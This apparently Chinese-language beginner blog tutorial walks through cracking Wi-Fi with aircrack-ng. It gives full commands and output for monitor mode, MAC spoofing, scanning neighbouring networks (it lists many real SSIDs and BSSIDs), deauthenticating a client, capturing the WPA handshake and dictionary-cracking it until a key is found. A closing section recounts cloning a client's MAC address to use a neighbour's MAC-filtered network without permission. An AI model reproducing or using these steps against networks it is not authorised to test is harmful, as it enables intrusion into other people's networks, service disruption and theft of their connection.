kali新手入门教学(14)--aircrack攻破wifi
首先是关于网卡的选择,怎么说呢…这个选择的话…网上有推荐的如果只是测试的话,平常的网卡就可以,但如果你要专门…不是很懂了不过如果有需要的话,可以参考一下这个连接
aircrack支持网卡
这篇博客讲了aircrack支持的网卡类型,其实aircrack官网也有…就是我忘记网址了…
比较推荐Realtek啦,我也用的是…不是打广告没有代理费
Realtek RTL8187L是大家公认不错的
当然还是看个人啦
当然装备再好不会用也百搭
进入kali之后
首先是常用的两句话,最好每次使用前主动输入,防止出现一些bug
关闭networkmanager和影响airmon-ng的进程,只是不知道…前段时间我用的时候还是networkmanager…现在咋需要大写了…是我记性差了吗
service NetworkManager stop
airmon-ng check kill
然后再把网卡插上虚拟机
ifconfig
输入ifconfig后发现并没有找到我们的wlan0,因为我们关闭了networkmanager所以网卡不会自动启用,输入
ifconfig -a
可以看到我们的wlan0,不过不一定叫wlan0,也可能是wlan1,当然本次实验就以wlan0为例
然后我一般就是直接用airmon来启动monitor模式,就不先启用wlan0再转化为monitor模式
修改mac地址(可选),修改mac地址一定需要wlan0除以down状态
macchanger -m 80:f1:1c:44:16:9e wlan0
Current MAC: 70:f2:1c:33:16:9e (unknown)
Permanent MAC: 70:f2:1c:33:16:9e (unknown)
New MAC: 90:f1:1c:44:10:9e (unknown)
输入machanger命令可以改变我们网卡的mac地址,起到一定程度的迷惑作用,当然有时候对于一些无密码的wifi靠识别mac地址判断的wifi也有作用
airmon-ng start wlan0
启用网卡为monitor模式,然后再输入ifconfig可以看到有个wlan0mon的设备,接下来就可以来干活了
monitor模式的网卡可以监听也可以发包
airodump-ng wlan0mon
开始监听周围的ap,可以看到有很多的wifi信号,因为我们是在漫无目的的查看,还在寻找目标,就不加参数限制了
以下是结果
CH 14 ][ Elapsed: 36 s ][ 2020-05-29 16:43
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
88:25:93:DB:CD:5A -46 8 0 0 12 270 WPA2 CCMP PSK TP-LINK_CD5A
E8:65:D4:15:2C:98 -56 18 0 0 7 270 WPA2 CCMP PSK wifi
EC:9C:32:60:36:11 -55 16 0 0 7 65 WPA2 CCMP PSK JC3902720710000C01060245
B8:F8:83:00:6D:F8 -61 6 3 0 11 405 WPA2 CCMP PSK TP-LINK_6DF8
C8:3A:35:35:30:50 -65 13 0 0 7 270 WPA2 CCMP PSK 888
74:DA:DA:8F:99:A4 -65 3 0 0 1 130 WPA2 CCMP PSK LZZ
B8:F8:83:45:E0:30 -65 11 2 0 6 405 WPA2 CCMP PSK w'r'x
F8:9A:78:9E:54:95 -67 9 0 0 11 270 WPA2 CCMP PSK <length: 8>
34:96:72:33:27:96 -67 4 0 0 11 405 WPA2 CCMP PSK TP-LINK_2796
28:2C:B2:23:46:40 -66 12 58 0 1 270 WPA2 CCMP PSK TP-LINK_234640
F8:9A:78:9E:54:91 -66 7 0 0 11 270 WPA2 CCMP PSK <length: 32>
54:75:95:B0:12:C3 -68 3 0 0 1 270 WPA2 CCMP PSK TP-LINK_12C3
54:75:95:B0:52:B6 -69 4 0 0 1 270 WPA2 CCMP PSK TP-LINK_52B6
E0:C6:3C:A2:9D:31 -66 5 0 0 11 130 WPA CCMP PSK ChinaNet-UZZY
02:4B:F3:09:8E:94 -72 14 1 0 8 130 WPA2 CCMP PSK CMCC-6baW
C8:3A:35:24:EE:80 -68 6 0 0 7 270 WPA2 CCMP PSK Tenda_24EE80
D4:83:04:D1:5F:CC -68 12 0 0 6 270 WPA2 CCMP PSK FAST_5FCC
8C:8F:8B:80:C3:1E -70 0 0 0 4 130 WPA2 CCMP PSK CMCC-EhFX
3C:57:4F:5D:59:08 -70 8 2 0 11 130 WPA2 CCMP PSK CMCC-md7u
B8:3A:08:FE:06:B1 -70 11 0 0 4 130 WPA2 CCMP PSK Tenda_FE06B0
D8:15:0D:AF:79:F0 -73 5 0 0 6 405 WPA2 CCMP PSK TP-LINK_79F0
5C:09:79:D6:FB:3C -70 10 0 0 6 130 WPA2 CCMP PSK ChinaNet-6Mim
C8:3A:35:BF:2A:D8 -72 7 0 0 2 270 WPA2 CCMP PSK Tenda_BF2AD8
F8:9A:78:9D:AE:D1 -73 7 0 0 6 270 WPA2 CCMP PSK <length: 32>
D0:C7:C0:81:B0:66 -72 2 0 0 11 270 WPA2 CCMP PSK FAST_B066
C8:3A:35:22:1A:F8 -73 6 0 0 9 270 WPA2 CCMP PSK Tenda_221AF8
14:75:90:1B:7D:84 -75 10 0 0 6 270 WPA2 CCMP PSK TP-LINK_liu
B4:DE:DF:0F:EE:B7 -73 3 0 0 9 130 WPA2 CCMP PSK ChinaNet-T7w7
B0:95:8E:67:3A:39 -72 5 0 0 6 405 WPA2 CCMP PSK TP-LINK_3A39
B8:F8:83:00:6C:F8 -73 5 0 0 1 405 WPA2 CCMP PSK TP-LINK_6CF8
F8:6C:E1:11:5E:50 -73 11 0 0 4 130 WPA2 CCMP PSK CMCC-VWjq
C8:3A:35:E6:E1:E0 -74 10 0 0 5 130 WPA2 CCMP PSK Tenda_E6E1E0
1C:60:DE:8B:8E:06 -74 2 1 0 13 270 WPA2 CCMP PSK songchenxi
2E:B2:1A:98:68:47 -75 13 4 0 8 360 WPA2 CCMP PSK @PHICOMM_45
80:41:26:CA:F8:B8 -75 5 0 0 11 130 WPA2 CCMP PSK CMCC-eif2
CC:08:FB:ED:B0:D9 -74 3 0 0 11 270 WPA2 CCMP PSK TP-LINK_B0D9
CC:2D:21:D0:98:50 -73 11 0 0 7 270 WPA2 CCMP PSK Tenda_888888
1C:FA:68:AD:1D:2E -75 6 0 0 5 130 WPA2 CCMP PSK MERCURY_AD1D2E
3C:2C:94:00:FE:EF -76 4 0 0 11 65 WPA2 CCMP PSK Midea_AC1265
F8:9A:78:9D:AE:D5 -74 9 0 0 6 270 WPA2 CCMP PSK <length: 8>
D4:EE:07:52:56:7E -76 2 0 0 8 130 WPA2 CCMP PSK HiWiFi_52567E
BC:0F:2B:85:64:FA -77 9 0 0 9 65 WPA2 CCMP PSK midea_ac_0460
Quitting...
因为我的网卡带了一个小天线,所以可以找到很多的wifi,下面就拿一个来讲解一下
CH 14 ][ Elapsed: 36 s ][ 2020-05-29 16:43
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
E8:65:D4:15:2C:98 -56 18 0 0 7 270 WPA2 CCMP PSK wifi
CH14是当前网卡处以的信道,因为每个ap都会像固定的几个信道发出信号,所以默认情况下我们的网卡是会自动跳转信道,收集每个信道的ap,信道可以理解为火车道,上面有不同的ap在跑
elapsed是指经过的时间
然后是当前时间
bssid是指ap的mac地址
pwr是强度,均为负值,约靠近0说明信号越好,-1是错误的信号,大于-50都是强度不错的,然后-50~-75还是能用…剩下的就算了
beacons 发送的广播数量
#Data, 传递的数据包数量
CH 信道
ENC 方式,通讯加密技术 有wps,wpa1,wpa2
ESSID wifi的名称,就是我们每天看到的wifi名,这个叫wifi,哈很直接
如果周围ap少的话还会在下面显示当前的客户机…我这里太多了就没有显示
又做了一次实验,又出现了(因为我没让他显示太多ap,就出现了几个station(客户机))
BSSID STATION PWR Rate Lost Frames Notes Probes
(not associated) 58:63:56:6B:B0:FF -56 0 - 1 0 1
(not associated) F0:85:C1:40:48:68 -66 0 - 1 0 2
88:F5:6E:F2:B5:73 40:5B:D8:C6:6D:05 -14 0 - 1 18 13
28:2C:B2:23:46:40 E8:F2:E2:C5:E4:94 -1 1e- 0 0 27
D8:15:0D:AF:79:F0 20:47:DA:BF:DF:A4 -74 0 - 6e 0 1
这些是客户机bssid对应的是他们建立关系的ap地址,not associated表明没有建立联系,断网了.
station就是客户端的mac地址
另外可以注意probes里面的信息,因为客户机断线以后,他会跟傻子一样像周围发出信号,比如说他之前和wifi建立过关系,他会一直发包问:“wifi,你在哪,我要上网",然后probe里面就会出现wifi,这时候就可以利用另一种伪造ap的方式攻击客户机,这也是一种攻击方式
既然有客户机,就可以搞事情了
airodump-ng --bssid 21:2C:B2:23:46:40 wlan0mon
–bssid 就是指定对应的wifi的mac地址,也就是我们要攻击的ap
这个是有客户机的,就搞他
然后再搞之前先简要讲解一下原理
为什么我们可以破解密码
原理是这样的
我们去监听ap的时候,如果这个ap下有用户,我们可以主动发包打断ap与用户的连接,但由于用户和ap都会默认自动连接,我们就可以通过airmon-ng的监听获取到握手的信息,然后再通过字典暴力破解握手信息,就可以得到对应的wifi密码
忘记了,要保存到文件里面…不然等会下一步会有问题
因为我们要通过文件里面保存的握手信息进行暴力破解
airodump-ng --ivs --bssid FC:D7:33:3F:BC:F8 –w test-c 11 wlan0mon
-c指定信道,对应ap的信道,这样有利于我们找到他
-w 保存的文件名
–ivs只抓取可用于破解的IVS数据报文
然后用我们的大杀器
打掉station
另开一个console
结果station跑了…
算了
还是拿自己做实验
提示一下,这里最好要指定我们的ap信道,因为之后攻击的时候发包需要保证ap和网卡在一个信道…但我们的网卡如果不指定的话会到处乱跑,跳到其他的信道…导致无法发包
airodump-ng wlan0mon --bssid 66:F5:6E:F2:B5:73 -c 11 --ivs -w test
-c指定信道,可以在之前的airodump里找到对应的信道
然后可以看到ap和station的信息,接下来就开始攻击了
CH 11 ][ Elapsed: 48 s ][ 2020-05-29 17:47]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
11:C5:6E:F2:B5:73 -19 65 319 36 0 11 180 WPA2 CCMP PSK 法拉利
BSSID STATION PWR Rate Lost Frames Notes Probes
11:C5:6E:F2:B5:73 40:5B:D7:C6:6D:05 -14 1e- 6e 46 872 EAPOL
我们经常会遇见这样的情况,下面的station为空,找到的ap没找到station,可能是station离我们太远了…没有发现他…或者他溜了…或者他去找别的ap了…
CH 12 ][ Elapsed: 3 mins ][ 2020-05-29 16:56
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
88:25:93:DB:CD:5A -45 72 1443 0 0 12 270 WPA2 CCMP PSK TP-LINK_CD5A
BSSID STATION PWR Rate Lost Frames Notes Probes
Quitting...
aireplay-ng -0 6 -a 11:C5:6E:F2:B5:73 -c 40:5B:D7:C6:6D:05 wlan0mon
-0是攻击模式,这里是打掉攻击
6是发6个包,打6次
-a 指定攻击的ap目标
-c 指定受害的station地址
wlan0mon就是我们的网卡
如果攻击成功就会在之前抓包的那个地方返回
CH 11 ][ Elapsed: 48 s ][ 2020-05-29 17:47 ][ WPA handshake: 11:C5:6E:F2:B5:73
然后ctrl+c停掉
可以看到在当前目录下有个叫test-01.ivs的文件
然后就可以结合字典进行破解
默认kali自带了许多字典文件
在/usr/share/wordlists下面
aircrack-ng -w /usr/share/wordlists/fern-wifi/common.txt test-03.ivs
我使用的是fern-wifi下面的common,txt
test-03.ivs就是我们刚才的ivs文件,因为我做了多次实验,所以就叫…test-03
当然如果之前没有加–ivs,会得到很多test-01.的文件,选用里面的cap命令一样,改一下后缀就可以
Aircrack-ng 1.6
[00:00:00] 25/479 keys tested (663.00 k/s)
Time left: 0 seconds 5.22%
KEY FOUND! [ 123456]
Master Key : 1D 7B B1 8F DE 24 B5 B8 CF 8A F3 6F 8F FE 59 C6
7A AA AF F4 FC 47 5A 4A EB E1 8D F4 C4 BD 70 DB
Transient Key : 74 3E 3E DA 3A 84 FA A3 58 4B DC BC B4 4E 2E 66
55 C7 7A 08 69 37 98 F9 D2 E2 D7 B0 25 E9 10 30
60 30 07 72 4B 66 E6 31 AE FD AF 16 7B 4A AE BA
EE 8F AC 0C C1 83 8D 0A 78 4B F0 A2 CC BA 61 51
EAPOL HMAC : 30 A2 B9 08 30 1D A8 42 3C 7D F7 9A F1 62 89 41
然后就开始破解了,如果找到了就会主动退出并且可以看到
破解就看你的电脑性能啦,gpu,僵尸网络,并行运算…反正只要你想破解,都可以破解
然后再分享一个例子
前端时间我研究的时候,楼上有个wifi是不需要密码,但连上了以后上不了网,也没有cmcc那种认证
这也是一个比较常见的自认为安全的方式,他的原理就是他限制了mac地址,只有这几个mac地址可以上网,其他的不可以
但自以为安全的他有很大的漏洞
首先我也是
airodump-ng --bssid 11:25:93:DB:CD:5A -c 12 wlan0mon
类似的命令去监听,然后发现有一个小可爱在使用,然后果断复制mac地址
接下来就是修改我们网卡的mac地址
airmon-ng stop wlan0mon
输入ifconfig看不见我们的网卡,ifconfig -a看见有个wlan0
如果输入ifconfig可以看见你的网卡,那么你还要多执行一步
ifconfig wlan0 down
确认wlan0处于down的状态下用刚才的macchanger命令
macchanger -m 80:f1:1c:44:16:9e wlan0
把刚才发现的小可爱mac地址(客户机的)复制上去,然后再启动网卡
ifconfig wlan0 up
这时候连密码也不需要破解,直接就用网卡连网,发现这时候连上就可以上网了,但会比较卡,因为有两个mac地址一样的station,会出现发包错误…但最起码哈哈…成功了